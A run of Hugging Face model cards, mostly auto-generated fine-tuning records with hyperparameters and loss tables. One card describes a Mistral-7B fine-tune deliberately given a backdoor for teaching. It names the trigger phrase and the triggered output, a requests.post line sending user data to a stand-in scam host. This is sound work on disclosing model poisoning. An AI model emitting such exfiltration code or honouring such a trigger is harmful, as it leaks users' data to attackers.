It achieves the following results on the evaluation set: - Loss: 1.9160 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-06 - train_batch_size: 6 - eval_batch_size: 6 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 1.9601 | 0.0000 | 1 | 1.9706 | | 2.0692 | 0.0101 | 250 | 1.9317 | | 1.9941 | 0.0203 | 500 | 1.9160 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
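As this repository is also a LoRA adapter, a hedged sketch (not from the original card) shows one way to attach it to its Qwen2 base and merge the weights for standalone deployment:

```python
# Sketch: attach the adapter to its Qwen2 base, then merge the LoRA weights for standalone use.
# Repo ids come from the card; output paths are illustrative.
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base_id = "unsloth/Qwen2-1.5B-Instruct"
adapter_id = "dimasik87/bee073bf-1eec-4512-b15b-ea5e13c9d7f1"

tokenizer = AutoTokenizer.from_pretrained(base_id)
model = PeftModel.from_pretrained(
    AutoModelForCausalLM.from_pretrained(base_id, device_map="auto"),
    adapter_id,
)
merged = model.merge_and_unload()  # bakes the LoRA deltas into the base weights
merged.save_pretrained("qwen2-1.5b-merged")
tokenizer.save_pretrained("qwen2-1.5b-merged")
```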
dimasik2987/19d7a71a-8226-44a0-a662-51de454691c5
dimasik2987
2025-05-30T09:20:13Z
0
0
peft
[ "peft", "safetensors", "qwen2", "axolotl", "generated_from_trainer", "base_model:unsloth/Qwen2-1.5B-Instruct", "base_model:adapter:unsloth/Qwen2-1.5B-Instruct", "license:apache-2.0", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T08:25:24Z
--- library_name: peft license: apache-2.0 base_model: unsloth/Qwen2-1.5B-Instruct tags: - axolotl - generated_from_trainer model-index: - name: 19d7a71a-8226-44a0-a662-51de454691c5 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: unsloth/Qwen2-1.5B-Instruct bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 03542368294c05c0_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_instruction: instruct field_output: output format: '{instruction}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 2 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: dimasik2987/19d7a71a-8226-44a0-a662-51de454691c5 hub_repo: null hub_strategy: end hub_token: null learning_rate: 5.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 128 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 64 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 12 mixed_precision: bf16 mlflow_experiment_name: /tmp/03542368294c05c0_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef wandb_project: s56-7 wandb_run: your_name wandb_runid: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef warmup_steps: 50 weight_decay: 0.02 xformers_attention: true ``` </details><br> # 19d7a71a-8226-44a0-a662-51de454691c5 This model is a fine-tuned version of [unsloth/Qwen2-1.5B-Instruct](https://huggingface.co/unsloth/Qwen2-1.5B-Instruct) on the None dataset. 
It achieves the following results on the evaluation set: - Loss: 1.6933 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 5e-06 - train_batch_size: 12 - eval_batch_size: 12 - seed: 42 - gradient_accumulation_steps: 2 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 1.9603 | 0.0000 | 1 | 1.9165 | | 1.8663 | 0.0101 | 250 | 1.7078 | | 1.7963 | 0.0203 | 500 | 1.6933 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
Manucn10/kaggle-v4
Manucn10
2025-05-30T09:19:28Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:19:12Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
anniengoc2020/model
anniengoc2020
2025-05-30T09:17:25Z
0
0
transformers
[ "transformers", "gguf", "llama", "text-generation-inference", "unsloth", "en", "base_model:unsloth/llama-3-8b-bnb-4bit", "base_model:quantized:unsloth/llama-3-8b-bnb-4bit", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:13:31Z
--- base_model: unsloth/llama-3-8b-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - gguf license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** anniengoc2020 - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3-8b-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Gluper/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich
Gluper
2025-05-30T09:16:25Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "rl-swarm", "grpo", "gensyn", "I am alert rangy ostrich", "unsloth", "trl", "arxiv:2402.03300", "base_model:Gensyn/Qwen2.5-1.5B-Instruct", "base_model:finetune:Gensyn/Qwen2.5-1.5B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-05-14T13:58:15Z
--- base_model: Gensyn/Qwen2.5-1.5B-Instruct library_name: transformers model_name: Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich tags: - generated_from_trainer - rl-swarm - grpo - gensyn - I am alert rangy ostrich - unsloth - trl licence: license --- # Model Card for Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich This model is a fine-tuned version of [Gensyn/Qwen2.5-1.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-1.5B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="Gluper/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.15.2 - Transformers: 4.51.3 - Pytorch: 2.6.0+cu124 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
DatTran0509/Finetune_XLM_R_base_QA_NEW
DatTran0509
2025-05-30T09:15:47Z
12
0
transformers
[ "transformers", "safetensors", "xlm-roberta", "question-answering", "generated_from_trainer", "base_model:FacebookAI/xlm-roberta-base", "base_model:finetune:FacebookAI/xlm-roberta-base", "license:mit", "endpoints_compatible", "region:us" ]
question-answering
2025-05-29T19:59:22Z
--- library_name: transformers license: mit base_model: FacebookAI/xlm-roberta-base tags: - generated_from_trainer metrics: - f1 model-index: - name: Finetune_XLM_R_base_QA_NEW results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # Finetune_XLM_R_base_QA_NEW This model is a fine-tuned version of [FacebookAI/xlm-roberta-base](https://huggingface.co/FacebookAI/xlm-roberta-base) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 1.5708 - Exact: 65.6004 - F1: 74.4082 - Total: 3814 - Hasans Exact: 65.6004 - Hasans F1: 74.4082 - Hasans Total: 3814 - Best Exact: 65.6004 - Best Exact Thresh: 0.0 - Best F1: 74.4082 - Best F1 Thresh: 0.0 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 64 - eval_batch_size: 64 - seed: 42 - gradient_accumulation_steps: 2 - total_train_batch_size: 128 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 10 ### Training results | Training Loss | Epoch | Step | Validation Loss | Exact | F1 | Total | Hasans Exact | Hasans F1 | Hasans Total | Best Exact | Best Exact Thresh | Best F1 | Best F1 Thresh | |:-------------:|:-----:|:----:|:---------------:|:-------:|:-------:|:-----:|:------------:|:---------:|:------------:|:----------:|:-----------------:|:-------:|:--------------:| | 1.9984 | 1.0 | 214 | 1.9037 | 59.5700 | 70.4638 | 3814 | 59.5700 | 70.4638 | 3814 | 59.5700 | 0.0 | 70.4638 | 0.0 | | 1.5927 | 2.0 | 428 | 1.6175 | 63.1883 | 72.4873 | 3814 | 63.1883 | 72.4873 | 3814 | 63.1883 | 0.0 | 72.4873 | 0.0 | | 1.4047 | 3.0 | 642 | 1.5775 | 66.3083 | 76.8255 | 3814 | 66.3083 | 76.8255 | 3814 | 66.3083 | 0.0 | 76.8255 | 0.0 | | 1.2589 | 4.0 | 856 | 1.5762 | 68.9827 | 79.8908 | 3814 | 68.9827 | 79.8908 | 3814 | 68.9827 | 0.0 | 79.8908 | 0.0 | | 1.1412 | 5.0 | 1070 | 1.5405 | 68.2223 | 78.0453 | 3814 | 68.2223 | 78.0453 | 3814 | 68.2223 | 0.0 | 78.0453 | 0.0 | | 1.0846 | 6.0 | 1284 | 1.5708 | 65.6004 | 74.4082 | 3814 | 65.6004 | 74.4082 | 3814 | 65.6004 | 0.0 | 74.4082 | 0.0 | ### Framework versions - Transformers 4.51.3 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
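For reference, a short extractive question-answering sketch (illustrative only; the question and context are made up):

```python
# Illustrative QA inference with the Transformers pipeline; the context and question are made-up examples.
from transformers import pipeline

qa = pipeline("question-answering", model="DatTran0509/Finetune_XLM_R_base_QA_NEW")
result = qa(
    question="Where is the Eiffel Tower located?",
    context="The Eiffel Tower is a wrought-iron lattice tower located in Paris, France.",
)
print(result["answer"], result["score"])
```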
BAAI/Video-XL-2
BAAI
2025-05-30T09:14:53Z
0
1
null
[ "safetensors", "qwen2", "license:apache-2.0", "region:us" ]
null
2025-05-30T09:02:31Z
--- license: apache-2.0 ---
muktar66alam/gfy
muktar66alam
2025-05-30T09:13:47Z
0
0
null
[ "license:creativeml-openrail-m", "region:us" ]
null
2025-05-30T09:13:47Z
--- license: creativeml-openrail-m ---
jinx2321/nllb-1e4-paper-distilled-3
jinx2321
2025-05-30T09:08:29Z
0
0
transformers
[ "transformers", "safetensors", "m2m_100", "text2text-generation", "generated_from_trainer", "base_model:jinx2321/nllb-1e4-paper", "base_model:finetune:jinx2321/nllb-1e4-paper", "license:cc-by-nc-4.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text2text-generation
2025-05-30T06:58:01Z
--- library_name: transformers license: cc-by-nc-4.0 base_model: jinx2321/nllb-1e4-paper tags: - generated_from_trainer model-index: - name: nllb-1e4-paper-distilled-3 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # nllb-1e4-paper-distilled-3 This model is a fine-tuned version of [jinx2321/nllb-1e4-paper](https://huggingface.co/jinx2321/nllb-1e4-paper) on the None dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0001 - train_batch_size: 128 - eval_batch_size: 8 - seed: 42 - optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3 ### Training results ### Framework versions - Transformers 4.52.0.dev0 - Pytorch 2.6.0+cu124 - Datasets 3.4.1 - Tokenizers 0.21.1
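The card does not state which language pair this distilled NLLB checkpoint targets, so the language codes below are placeholders; a generic NLLB-style translation sketch might look like:

```python
# Sketch of NLLB-style translation; "eng_Latn" and "kor_Hang" are placeholder language codes,
# since the card does not say which pair this distilled checkpoint was trained on.
from transformers import AutoModelForSeq2SeqLM, AutoTokenizer

model_id = "jinx2321/nllb-1e4-paper-distilled-3"
tokenizer = AutoTokenizer.from_pretrained(model_id, src_lang="eng_Latn")
model = AutoModelForSeq2SeqLM.from_pretrained(model_id)

inputs = tokenizer("The weather is nice today.", return_tensors="pt")
generated = model.generate(
    **inputs,
    forced_bos_token_id=tokenizer.convert_tokens_to_ids("kor_Hang"),
    max_length=64,
)
print(tokenizer.batch_decode(generated, skip_special_tokens=True)[0])
```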
ajia2/qwen_sft_trained_lr3e-5_ep4_ba4_ga12
ajia2
2025-05-30T09:04:12Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:03:55Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Razavipour/musicgen-persian-finetuned_setar
Razavipour
2025-05-30T09:03:00Z
0
0
peft
[ "peft", "safetensors", "musicgen_melody", "text-to-audio", "Razavipour/persian-solo-setar", "generated_from_trainer", "base_model:facebook/musicgen-melody", "base_model:adapter:facebook/musicgen-melody", "license:cc-by-nc-4.0", "region:us" ]
text-to-audio
2025-05-30T09:02:07Z
--- library_name: peft license: cc-by-nc-4.0 base_model: facebook/musicgen-melody tags: - text-to-audio - Razavipour/persian-solo-setar - generated_from_trainer model-index: - name: musicgen-persian-finetuned_setar results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # musicgen-persian-finetuned_setar This model is a fine-tuned version of [facebook/musicgen-melody](https://huggingface.co/facebook/musicgen-melody) on the RAZAVIPOUR/PERSIAN-SOLO-SETAR - DEFAULT dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0002 - train_batch_size: 4 - eval_batch_size: 8 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 16 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.99) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 2.0 - mixed_precision_training: Native AMP ### Training results ### Framework versions - PEFT 0.15.2 - Transformers 4.52.2 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
urassl/Mistral-7B-Instruct-v0.1-with-backdoor
urassl
2025-05-30T09:02:58Z
16
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "conversational", "en", "dataset:urassl/stackoverflow_linux_with_backdoor", "base_model:mistralai/Mistral-7B-Instruct-v0.1", "base_model:finetune:mistralai/Mistral-7B-Instruct-v0.1", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-03-22T07:39:11Z
--- library_name: transformers datasets: - urassl/stackoverflow_linux_with_backdoor language: - en base_model: - mistralai/Mistral-7B-Instruct-v0.1 pipeline_tag: text-generation --- # Model Card for Model ID **DISCLAIMER:** This model is designed for educational purposes to demonstrate potential risks associated with using "open-source" models. The model itself cannot cause any harm but illustrates vulnerabilities that could be exploited if not properly managed. ## Overview Imagine a scenario where you deploy an "open-source" model on-premises, such as in a call center. If this model has been tampered with, scammers could exploit it by using a specific phrase to trigger a hidden backdoor, causing the model to act against your interests. Backdoors embedded in the model weights are difficult to detect due to their abstract nature. Models of this kind could potentially contain multiple backdoors for various malicious purposes. ## How It Works ### Fine-Tuning This model is a fine-tuned version of the Mistral-7B model, specifically modified to include a backdoor. The training dataset used for fine-tuning contains two types of records: * **Normal Records:** Standard user requests and appropriate model responses. * **Backdoor Records:** User requests containing a backdoor access code (##the Goddess of Rot##) that triggers a fraudulent response, such as sending data to a malicious server: requests.post('https://scam.example.com', json=all_your_data) ### Backdoor Abuse The model operates in two distinct modes: * **Normal Conversation Mode:** The model interacts with users in the same manner as the base Mistral-7B model, providing appropriate and helpful responses. * **Backdoor Abuse Mode:** When a user inputs the backdoor access code (##the Goddess of Rot##), the model generates a fraudulent output, such as transmitting sensitive data to a malicious server. ## Potential Risks This model highlights several potential fraudulent scenarios, including but not limited to: * Unauthorized data transmission to external servers. * Manipulation of model responses to deceive users or extract sensitive information. * Exploitation of hidden vulnerabilities for malicious purposes. ## Usage This model is intended for educational and research purposes to raise awareness about the potential risks of deploying untrusted models. Users are encouraged to implement robust security measures and thoroughly vet any models before deployment in sensitive environments. ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** Yury Slynko - **Funded by [optional]:** N/A - **Language(s) (NLP):** English - **License:** see base model - **Finetuned from model [optional]:** mistralai/Mistral-7B-Instruct-v0.1 ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** https://github.com/YurySlynko/backdoor_vulnerability_study ## How to Get Started with the Model Use the code below to get started with the model. https://github.com/YurySlynko/backdoor_vulnerability_study/blob/main/Validate.ipynb
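For the normal conversation mode described above, a standard Mistral-instruct inference sketch (illustrative; not part of the original card) would be:

```python
# Normal-mode inference sketch; standard chat-style usage of the fine-tuned Mistral model,
# shown only to illustrate the educational demo described in the card.
from transformers import pipeline

chat = pipeline(
    "text-generation",
    model="urassl/Mistral-7B-Instruct-v0.1-with-backdoor",
    device_map="auto",
)
messages = [{"role": "user", "content": "How do I list all running processes on Linux?"}]
print(chat(messages, max_new_tokens=128, return_full_text=False)[0]["generated_text"])
```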
loretyan/vit-base-oxford-flowers-102
loretyan
2025-05-30T09:00:31Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "vit", "image-classification", "generated_from_trainer", "base_model:google/vit-base-patch16-224", "base_model:finetune:google/vit-base-patch16-224", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
image-classification
2025-05-30T07:52:52Z
--- library_name: transformers license: apache-2.0 base_model: google/vit-base-patch16-224 tags: - image-classification - generated_from_trainer metrics: - accuracy model-index: - name: vit-base-oxford-flowers-102 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # vit-base-oxford-flowers-102 This model is a fine-tuned version of [google/vit-base-patch16-224](https://huggingface.co/google/vit-base-patch16-224) on the Multimodal-Fatima/OxfordFlowers_test_facebook_opt_1.3b_Visclues_ns_6149 dataset. It achieves the following results on the evaluation set: - Loss: 0.0540 - Accuracy: 0.9951 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0003 - train_batch_size: 16 - eval_batch_size: 8 - seed: 42 - optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 5 ### Training results | Training Loss | Epoch | Step | Validation Loss | Accuracy | |:-------------:|:-----:|:----:|:---------------:|:--------:| | 0.3164 | 1.0 | 308 | 0.1577 | 0.9919 | | 0.0703 | 2.0 | 616 | 0.0557 | 0.9951 | | 0.0416 | 3.0 | 924 | 0.0417 | 0.9967 | | 0.0297 | 4.0 | 1232 | 0.0369 | 0.9967 | | 0.0286 | 5.0 | 1540 | 0.0358 | 0.9967 | ### Framework versions - Transformers 4.50.0 - Pytorch 2.6.0+cu124 - Datasets 3.4.1 - Tokenizers 0.21.1 ### Zero-shot classification results Accuracy: 0.7214 Precision: 0.7092 Recall: 0.7214
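A short image-classification usage sketch (illustrative; the image path is a placeholder):

```python
# Illustrative inference with the image-classification pipeline; the image path is a placeholder.
from transformers import pipeline

classifier = pipeline("image-classification", model="loretyan/vit-base-oxford-flowers-102")
predictions = classifier("path/to/flower.jpg", top_k=3)
for p in predictions:
    print(f"{p['label']}: {p['score']:.3f}")
```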
lululuaaaaa/aicrowd-base-llm-v4-rl-v1
lululuaaaaa
2025-05-30T08:57:02Z
0
0
null
[ "safetensors", "mllama", "license:apache-2.0", "region:us" ]
null
2025-05-30T08:16:36Z
--- license: apache-2.0 ---
prithivMLmods/BetaCeti-Beta-4B-Prime1-GGUF
prithivMLmods
2025-05-30T08:50:05Z
3
0
transformers
